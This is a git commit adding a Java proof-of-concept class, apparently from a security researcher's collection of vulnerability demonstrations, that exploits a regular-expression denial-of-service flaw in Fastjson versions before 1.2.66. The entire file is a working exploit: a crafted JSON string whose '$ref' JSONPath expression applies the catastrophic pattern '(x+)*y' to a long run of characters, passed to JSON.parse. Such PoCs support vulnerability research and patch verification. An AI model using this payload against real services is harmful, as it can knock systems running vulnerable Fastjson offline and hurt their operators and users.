feat:添加fastjson dos payload

“threedr3am” · “threedr3am” · commit ca020643ee08 · 2020-03-25T15:39:08.000+08:00
diff --git a/fastjson/src/main/java/com/threedr3am/bug/fastjson/dos/ReDOSPoc.java b/fastjson/src/main/java/com/threedr3am/bug/fastjson/dos/ReDOSPoc.java
@@ -0,0 +1,16 @@
+package com.threedr3am.bug.fastjson.dos;
+
+import com.alibaba.fastjson.JSON;
+
+/**
+ * 正则DOS Fastjson < 1.2.66
+ *
+ * @author threedr3am
+ */
+public class ReDOSPoc {
+
+  public static void main(String[] args) {
+    String payload = "{\"aaaaa\":\"xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\",\"regex\":{\"$ref\":\"$[aaaaa rlike '(x+)*y']\"}}";
+    JSON.parse(payload);
+  }
+}
